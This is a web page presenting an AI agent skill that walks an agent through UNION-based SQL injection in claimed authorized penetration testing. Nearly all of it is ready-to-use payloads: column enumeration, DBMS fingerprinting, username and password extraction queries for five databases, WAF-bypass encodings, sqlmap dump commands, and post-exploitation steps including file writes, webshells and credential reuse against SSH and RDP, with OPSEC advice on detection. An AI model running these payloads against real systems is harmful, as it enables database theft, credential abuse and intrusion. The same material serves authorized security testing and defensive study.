Agent skill
sql-injection-union
Guide UNION-based SQL injection exploitation during authorized penetration testing.
Install this agent skill to your Project
npx add-skill https://github.com/blacklanternsecurity/red-run/tree/main/skills/web/sql-injection-union
SKILL.md
UNION-Based SQL Injection
You are helping a penetration tester exploit UNION-based SQL injection. The target application renders query results in the HTTP response, allowing direct data extraction by appending UNION SELECT. This is the fastest SQLi extraction technique when it works. All testing is under explicit written authorization.
Engagement Logging
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
- Print
[sql-injection-union] Activated → <target>to the screen on activation. - Evidence → save significant output to
engagement/evidence/with descriptive filenames (e.g.,sqli-users-dump.txt,ssrf-aws-creds.json).
State Management
Call get_state_summary() from the state MCP server to read current
engagement state. Use it to:
- Skip re-testing targets, parameters, or vulns already confirmed
- Leverage existing credentials or access for this technique
- Understand what's been tried and failed (check Blocked section)
Your return summary must include:
- New targets/hosts discovered (with ports and services)
- New credentials or tokens found
- Access gained or changed (user, privilege level, method)
- Vulnerabilities confirmed (with status and severity)
- Pivot paths identified (what leads where)
- Blocked items (what failed and why, whether retryable)
Prerequisites
- Confirmed SQL injection point (see web-discovery)
- Query output rendered somewhere in the HTTP response
- UNION keyword not blocked by WAF (if blocked, try sql-injection-error or sql-injection-blind)
Step 1: Assess
If not already provided by the orchestrator or conversation context, determine:
- Injection point — URL, parameter name, request method
- Response behavior — does query output appear in the page?
- DBMS — if known from error messages or prior testing
Skip if context was already provided.
Step 2: Determine Column Count
Two methods — try both, use whichever succeeds.
ORDER BY method — increment until error:
' ORDER BY 1--+ -- OK
' ORDER BY 2--+ -- OK
' ORDER BY 3--+ -- OK
' ORDER BY 4--+ -- ERROR -> 3 columns
UNION SELECT NULL method — increment NULLs until no error:
' UNION SELECT NULL--+ -- ERROR
' UNION SELECT NULL,NULL--+ -- ERROR
' UNION SELECT NULL,NULL,NULL--+ -- OK -> 3 columns
Step 3: Find Displayed Columns
Replace NULLs one at a time with a visible marker:
' UNION SELECT 'AAA',NULL,NULL--+
' UNION SELECT NULL,'BBB',NULL--+
' UNION SELECT NULL,NULL,'CCC'--+
Look for AAA, BBB, or CCC in the response. Those column positions are your extraction points.
Step 4: Identify DBMS
If not already known, inject version functions in a displayed column:
' UNION SELECT version(),NULL,NULL--+ -- MySQL / PostgreSQL
' UNION SELECT @@version,NULL,NULL--+ -- MSSQL
' UNION SELECT banner,NULL,NULL FROM v$version WHERE ROWNUM=1--+ -- Oracle
' UNION SELECT sqlite_version(),NULL,NULL--+ -- SQLite
Step 5: Extract Data
MySQL
-- Current user and database
' UNION SELECT user(),database(),NULL--+
-- List all databases
' UNION SELECT GROUP_CONCAT(schema_name),NULL,NULL FROM information_schema.schemata--+
-- List tables in target database
' UNION SELECT GROUP_CONCAT(table_name),NULL,NULL FROM information_schema.tables WHERE table_schema='TARGET_DB'--+
-- List columns in target table
' UNION SELECT GROUP_CONCAT(column_name),NULL,NULL FROM information_schema.columns WHERE table_name='TARGET_TABLE'--+
-- Extract data
' UNION SELECT GROUP_CONCAT(username,0x3a,password),NULL,NULL FROM TARGET_DB.TARGET_TABLE--+
Dump In One Shot (DIOS):
' UNION SELECT CONCAT('~',(SELECT GROUP_CONCAT(table_name,0x3a,column_name SEPARATOR 0x0a) FROM information_schema.columns WHERE table_schema=database())),NULL,NULL--+
Without information_schema (when blocked by WAF):
' UNION SELECT GROUP_CONCAT(table_name),NULL,NULL FROM mysql.innodb_table_stats WHERE database_name=database()--+
MSSQL
-- Current user and database
' UNION SELECT SYSTEM_USER,DB_NAME(),NULL--+
-- List all databases
' UNION SELECT STRING_AGG(name,','),NULL,NULL FROM master..sysdatabases--+
-- List tables in current database
' UNION SELECT STRING_AGG(name,','),NULL,NULL FROM sysobjects WHERE xtype='U'--+
-- List columns in target table
' UNION SELECT STRING_AGG(name,','),NULL,NULL FROM syscolumns WHERE id=OBJECT_ID('TARGET_TABLE')--+
-- Extract data
' UNION SELECT STRING_AGG(username+':'+password,','),NULL,NULL FROM TARGET_TABLE--+
-- FOR JSON extraction (full table as JSON)
' UNION SELECT (SELECT * FROM TARGET_TABLE FOR JSON AUTO),NULL,NULL--+
Iterate databases when STRING_AGG unavailable (older MSSQL):
' UNION SELECT DB_NAME(0),NULL,NULL--+
' UNION SELECT DB_NAME(1),NULL,NULL--+
PostgreSQL
-- Current user and database
' UNION SELECT current_user,current_database(),NULL--+
-- List all databases
' UNION SELECT STRING_AGG(datname,','),NULL,NULL FROM pg_database--+
-- List tables in public schema
' UNION SELECT STRING_AGG(tablename,','),NULL,NULL FROM pg_tables WHERE schemaname='public'--+
-- List columns in target table
' UNION SELECT STRING_AGG(column_name,','),NULL,NULL FROM information_schema.columns WHERE table_name='TARGET_TABLE'--+
-- Extract data
' UNION SELECT STRING_AGG(username||':'||password,','),NULL,NULL FROM TARGET_TABLE--+
-- XML helper — dump entire table in one query
' UNION SELECT query_to_xml('SELECT * FROM TARGET_TABLE',true,false,'')::text,NULL,NULL--+
Oracle
Oracle requires FROM dual for every SELECT without a table. Use ROWNUM instead of LIMIT.
-- Current user
' UNION SELECT user,global_name,NULL FROM global_name--+
-- List tables
' UNION SELECT LISTAGG(table_name,',') WITHIN GROUP (ORDER BY table_name),NULL,NULL FROM user_tables--+
-- List columns
' UNION SELECT LISTAGG(column_name,',') WITHIN GROUP (ORDER BY column_id),NULL,NULL FROM all_tab_columns WHERE table_name='TARGET_TABLE'--+
-- Extract data
' UNION SELECT LISTAGG(username||':'||password,',') WITHIN GROUP (ORDER BY username),NULL,NULL FROM TARGET_TABLE--+
Without LISTAGG (Oracle < 11.2):
' UNION SELECT RTRIM(XMLAGG(XMLELEMENT(e,table_name||',').EXTRACT('//text()') ORDER BY table_name).GetClobVal(),','),NULL,NULL FROM user_tables--+
SQLite
-- Version
' UNION SELECT sqlite_version(),NULL,NULL--+
-- List all tables
' UNION SELECT GROUP_CONCAT(tbl_name),NULL,NULL FROM sqlite_master WHERE type='table'--+
-- List columns (uses pragma)
' UNION SELECT GROUP_CONCAT(name),NULL,NULL FROM pragma_table_info('TARGET_TABLE')--+
-- Extract data
' UNION SELECT GROUP_CONCAT(username||':'||password),NULL,NULL FROM TARGET_TABLE--+
Step 6: Post-Exploitation
After extracting credentials or sensitive data:
- File read — MySQL
LOAD_FILE(), MSSQLOPENROWSET BULK, PostgreSQLpg_read_file() - File write — MySQL
INTO OUTFILE, SQLiteATTACH DATABASE - Command execution — route to sql-injection-stacked
- Credential reuse — test against SSH, RDP, admin panels
Step 7: Escalate or Pivot
STOP and return to the orchestrator with:
- What was achieved (RCE, creds, file read, etc.)
- New credentials, access, or pivot paths discovered
- Context for next steps (platform, access method, working payloads)
OPSEC Notes
- UNION SELECT is read-only — no database artifacts to clean up
UNION,information_schema,GROUP_CONCAT/STRING_AGG/LISTAGGappear in web logs- Anomalous response sizes from large data dumps may trigger alerts
- If you wrote files (webshells via INTO OUTFILE), remove them after use
Troubleshooting
UNION Blocked by WAF
-- Case variations
' UnIoN SeLeCt NULL,NULL,NULL--+
-- Inline comments (MySQL)
' /*!50000UNION*/ /*!50000SELECT*/ NULL,NULL,NULL--+
-- Double URL encoding
%252f%252a*/UNION%252f%252a*/SELECT
-- UNION ALL instead of UNION
' UNION ALL SELECT NULL,NULL,NULL--+
Column Type Mismatch
If UNION SELECT 'string',NULL,NULL fails, the column might be numeric:
' UNION SELECT 1,2,3--+
' UNION SELECT CAST(user() AS UNSIGNED),NULL,NULL--+
No Visible Output
Query executes but data doesn't appear in the response:
- Try different column positions
- Wrap in HTML comment:
' UNION SELECT CONCAT('<!--',user(),'-->'),NULL,NULL--+ - Switch to sql-injection-error or sql-injection-blind
Automated Extraction with sqlmap
# Basic UNION extraction
sqlmap -u "https://TARGET/page?id=1" --batch --technique=U --dbs
# From Burp request file
sqlmap -r request.txt --batch --technique=U --dbs
# Dump specific table
sqlmap -r request.txt --batch -D TARGET_DB -T TARGET_TABLE --dump
# With tamper scripts for WAF bypass
sqlmap -r request.txt --batch --tamper=space2comment,between --technique=U --dbs
Recommended Agent Skills
Expand your agent's capabilities with these related and highly-rated skills.
credential-recovery
Offline credential and file recovery with hashcat and john. Use when any skill captures hashes (NTLM, Kerberos TGS/AS-REP, shadow, MSCACHE2) or encrypted files (ZIP, Office, PDF, KeePass, SSH key, 7z, RAR). Trigger phrases: "recover this hash", "offline recovery", "john", "hashcat", "zip2john", "password-protected file". Do NOT use for online password attacks (spraying, brute force against services) — use password-spraying instead.
remote-access-enumeration
Enumeration of remote access services: FTP, SSH, RDP, VNC, and WinRM. Checks anonymous access, default credentials, version vulnerabilities, and authentication methods. Use after network-recon identifies remote access ports.
smb-enumeration
SMB share enumeration, access testing, password policy extraction, and content searching. Enumerates shares via null session, guest, and authenticated access. Covers share listing, per-share access testing, MANSPIDER content search, and SMB vulnerability detection (signing, EternalBlue). Use after network-recon identifies SMB ports (139/445).
infrastructure-enumeration
Enumeration of infrastructure services: DNS, SMTP, SNMP, IPMI, NFS, TFTP, RPC/MSRPC, and HTTP/HTTPS surface detection. Checks zone transfers, open relays, default community strings, cipher zero, NFS exports, and web technology fingerprinting. Use after network-recon identifies infrastructure ports.
network-recon
Network reconnaissance, host discovery, port scanning, and OS fingerprinting. Produces a port/service map that the orchestrator uses to route to service-specific enumeration skills.
container-escapes
Container escape, Docker breakout, and Kubernetes exploitation.
Didn't find tool you were looking for?